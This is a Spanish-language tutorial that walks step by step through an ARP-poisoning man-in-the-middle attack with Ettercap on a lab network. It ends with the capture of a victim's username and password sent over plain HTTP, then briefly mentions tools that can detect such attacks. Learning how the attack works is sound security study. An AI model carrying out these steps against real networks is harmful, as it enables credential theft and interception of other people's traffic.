Por que necesitamos saber la ip de nuestra vitima y del router? la respuesta es sencilla, lo que
vamos a hacer es ponernos "en medio de ellos 2" para poder estar interceptando las
comunicaciones
este tipo de ataque se conoce como man in the middle o ataque de hombre en medio.

Entonces aqui damos click al ip de mi victima y despues damos click al boton que dice Add to
target 1


Ahi vemos que nos aparece el mensaje en la parte de abajo y dice Host 192.168.1.20 addes to
TARGET 1.
Ahora le damos click a la ip del modem "192.168.1.254" y damos click en el boton que dice Add to
Target 2


El siguiente paso sera ir al menu Mitm y seleccionar arp poisoning, pero antes de eso vamos a la
computadora con windows 7 (que es nuestra victima) habrimos la consola de cmd y escribimos el
comando:
arp -a


El protocolo ARP tiene un papel clave entre los protocolos de capa de Internet relacionados con el
protocolo TCP/IP,
ya que permite que se conozca la direccin fsica de una tarjeta de interfaz de red correspondiente
a una direccin IP.
Por eso se llama Protocolo de Resolucin de Direccin (en ingls ARP significa Address Resolution
Protocol).
Cada equipo conectado a la red tiene un nmero de identificacin de 48 bits.
ste es un nmero nico establecido en la fbrica en el momento de fabricacin de la tarjeta.

fuente: wikipedia

Entonces el comando arp -a me muestra las direcciones mac que le corresponde a cada dispositivo
de la red.
Por que estoy mostrando esto por que veremos como es el cambio cuando se infectan las tablas
arp con ettercap.


Entonces ahora si vamos al menu Mitm y seleccionamos Arp poisoning (envenenar arp :D )


Una vez selccionado Arp poisonin nos saldra el siguiente cuadro, ahi seleccionamos la opcin que
dice Sniff remote conections y damos click en el boton ok


Por ultimo vamos al menu Start y selecionamos start sniffing


Acontinuacion veremos como al principio con el comando arp -a la ip de kali (192.168.1.99) tiene la
mac address 00-0c-29-3a-bc-f9 y la ip del moden (192.168.1.254) tiene la mac address 00-23-51-
0c-5b-b9. Eso fue antes de lanzar el esnifeo en la segunda parte volvemos a poner el comando en
la consola de windows arp -a y vemos como la ip del modem tiene la misma mac address que la ip
de kali :D :D :D :D :D


En este caso nuestra victima esta entrando a la pagina http://www.directoriow.com y se va a
loguear en su cuenta




Ahora vemos en la esquina superior derecha que el usuario ya se encuentra logueado :D



Ahora vemos que ettercap captur el usuario y la contrasea del sitio donde se logueo la victima :)
esto, fu posible por que la pagina usa http en vez de https y las contraseas viajan por la red en
texto plano en https las contraseas estan encriptadas.

tambin podemos ver que aparece 2 vecese user con un pass diferente esto es por que el primero
fue un error en la contrasea.


Esta es solo una pequea muestra de todo lo que puede hacer ettercap, solo como comentario
ettercap puede hacer muchisimas cosas mas (redirigir trfico, ver las imagenes que esten viendo
los usuarios conectados a la red, etc etc).

Hay programas que detectan este tipo de ataques, el antivirus eset detecta cuando alguien esta
infectando las tablas arp, y hay muchos programas mas que detectan este tipo de ataques ya te
tocar investigar.

Espero haya quedado todo muy claro :D